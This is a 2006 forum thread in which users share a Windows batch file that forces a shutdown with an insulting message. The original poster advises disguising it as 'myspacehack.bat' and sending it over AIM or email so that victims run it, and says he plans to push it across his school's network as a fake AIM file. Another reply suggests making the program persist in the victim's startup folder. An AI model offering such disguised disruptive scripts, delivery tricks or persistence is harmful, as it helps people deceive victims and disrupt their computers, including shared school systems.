ThyElite Forums

ThyElite Forums (http://www.thyelite.com/forum/index.php)
-   General Talk (http://www.thyelite.com/forum/forumdisplay.php?f=14)
-   -   Pissed at someone? Send them this! (http://www.thyelite.com/forum/showthread.php?t=2653)

MYMOMMAGOTBEEF 08-17-2006 12:58 PM

Pissed at someone? Send them this!
 
1: Well if your pissed at someone just make a simple batch file.
AUTOEXEC.bat <---name of file
save into the c:
@echo off <----turns the echo off...
shutdown * -s -t 5 -c That's what you get for f*cking with me! <---shuts down computer and displays that little message on the screen. Shuts down after 5 seconds (-t).

I little something i've learned from back in the day's with aimkaos :D

PlasmaShock 08-17-2006 01:02 PM

thats confusing.

darkphaux 08-17-2006 01:10 PM

yes it is a little confusing could you please just post the code and the instructions

MYMOMMAGOTBEEF 08-17-2006 01:35 PM

Lol. Ok Open up note pad. Then you type:
@echo off
shutdown * -s -t 5 -c That's what you get for fucking with me!

Then save it as AUTOEXEC.BAT BAT stands for batch. Make sure its saved in your c:/ drive. But dont ever click on it :D:D:D. Or name it something else. I like to name it myspacehack.bat and send it over through aim or e-mail. Stupid kids like my friends click on it then the malicious file begins >:D!

Ok let me break it down.
@echo off (is a silly command. :D lol no. it turns the echo off)
shutdown * -s (means to shutdown the computer)
-t 5 (means shutdown in 5 seconds. you can change 5 to whatever reasonable)
-c (means comment. you can put anything there after the -c with a following space)

PlasmaShock 08-17-2006 03:47 PM

thats cool lol.

darkphaux 08-17-2006 11:56 PM

:P iv got ideas for the new scool year...and btw cant you also just open up dos and type edit, then type in @echo off
shutdown * -s -t 5 -c That's what you get for fucking with me!
and save it as AUTOEXE.bat

simonmanu 08-18-2006 02:10 PM

hay that is good i got just the person lol

MYMOMMAGOTBEEF 08-19-2006 09:49 PM

Lol pwnt. :D Yea dark you could do it that why by using font :D Yup that's what im going to do this year at school :D Im going to make a batch file then send it over the schools network to everybody in computer class and tell them it's a aim :D Then wait for their reaction :D

DefectiveProduct 08-19-2006 09:51 PM

Better yet, you could make a program that puts itself in the victims startup folder. And in the Form_Load event, you would make the program shut down their computer.

Wouldn't that be a bitch?

MYMOMMAGOTBEEF 08-19-2006 09:54 PM

Yea it would :D great idea Def :D:D something I should get to work on.


All times are GMT -6. The time now is 01:24 AM.

Powered by vBulletin® Version 3.6.8
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.